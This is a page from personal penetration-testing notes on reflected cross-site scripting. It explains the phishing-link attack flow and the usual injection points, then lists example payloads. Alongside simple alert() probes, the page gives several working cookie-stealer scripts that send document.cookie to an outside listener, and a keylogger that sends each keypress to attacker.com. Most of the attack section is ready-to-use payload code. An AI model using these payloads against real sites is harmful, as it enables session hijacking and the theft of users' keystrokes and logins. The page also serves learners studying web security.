📖
NOTES
  • Welcome!
  • Reference
    • Hacking
      • Penetration Testing Resources Bookmarks
        • Research Links
        • Cheat Sheet
        • Learning/Training
        • Tools
        • Payloads
        • Shell
        • AI
        • Reads
        • Podcast
        • Social Engineering
        • Payloads
      • Web/App Pentesting
        • SQL Injection
          • SQL Injection In The URL
          • SQL Injection In The Search Field
          • SQL Injection in Login forms
          • Boolean SQL Injection Blind
          • Time based SQL Injection Blind
          • Bypassing SQL Filters
          • SQL Injection with sqlmap
          • XPath Injection - Authentication Bypass
            • XPath Advanced Data Exfiltration
          • Payloads
        • XSS
          • Payloads
          • XSS Reflected
          • XSS Stored
          • Dom-based
          • Blind
        • Command Injection
          • Payloads
        • File Upload
          • Payloads
          • Bypass Filters
          • File Upload Tricks
        • SSRF
          • Payloads
        • LFI/RFI
          • Payloads
        • LDAP Injection
      • Port Swigger
        • Access control
          • Lab: Unprotected admin functionality
          • Unprotected admin functionality with unpredictable URL
          • User role controlled by request parameter
          • User ID controlled by request parameter, with unpredictable user IDs
          • User ID controlled by request parameter with password disclosure
        • Authentication
          • Username enumeration via different responses
        • Server-side request forgery (SSRF)
          • Basic SSRF against the local server
          • Basic SSRF against another back-end system
        • File Upload Vulnerabilities
          • Remote code execution via web shell upload
        • SQL Injection
          • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
      • Burp
        • Setting up Macro for intruder
      • ☁️Cloud
        • Tools
        • AWS
          • 🪣S3 Buckets
          • Amazon IAM
          • Dockers
            • Tools
        • Azure
        • GCP
      • Networking
        • Cheat Sheet
      • Hardware Hacking
        • Computer BIOS
    • HTML/CSS/JAVA
      • Tools
      • HTTP Response Status Codes
      • Bootstrap Templates
      • SSL
      • cURL
      • Grep
    • DataBase
      • My SQL
        • Cheat Sheet
        • Tools
    • PYTHON3
      • Code Resources
      • Python Reference Guide
        • Cheat Sheet
      • Code Projects
        • Jiggler Mouse
        • loan calculator
        • Bilnd LDAP Data Exfiltration
    • SEO
      • Tools
      • On-Page SEO
      • Local SEO and Keyword Research
      • Content Optimization
      • Technical SEO
      • Off-Page SEO Tools
      • Google Ads
    • Cloud
      • AWS
        • Light Sail
          • Hosting Website on Light Sail and Namecheap
        • Boto3
      • Azure
      • GCP
    • Files
      • PDF
Powered by GitBook
On this page
  1. Reference
  2. Hacking
  3. Web/App Pentesting
  4. XSS

XSS Reflected

Reflected XSS

This starts by an attacker crafting a malicious email and then encouraging a user to click it. The malicious URL is often placed within a phishing email, but it could also be placed on a public website, such as a link within a comment. When the user clicks the malicious URL, it sends an HTTP request to a server with the user's cookie which the attacker can use to hijack the user/admin account through what's called session hijacking. To summarize, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

Entry points

  • Parameters in the URL Query String

  • URL File Path

  • Sometimes HTTP Headers

  • Search Fields

  • Comments section

  • Contact Forms

Example Payloads

JS

<script>alert("Hello")</script>

<script>alert(window.location.hostname)</script>

"><script>alert('XSS');</script> 
[suitable for escaping input tags]

<textarea><script>alert('THM');</script>
[suitable for escaping text areas]

';alert('Hi_There');//'

Cookie Stealer

[1] JS

<script>fetch('http://10.8.133.250:8000/steal?cookie=' + btoa(document.cookie));</script>

[2] JS

<script>window.location='http://10.8.133.250:8000/cookie?'+document.cookie;</script>

[3] JS

<script>var myimg = new Image(); myimg.src = 'http://10.14.2.200/q?a=' + document.cookie;</script>

[4] JS

<script>document.location='http://ip:8000/XSS/grabber.php?c='+document.cookie;</script>

Keylogger

<script>document.onkeypress = 
    function(e) {
        fetch('http://attacker.com/log?key=' + btoa(e.key));
    }</script>
PreviousPayloadsNextXSS Stored

Last updated 1 year ago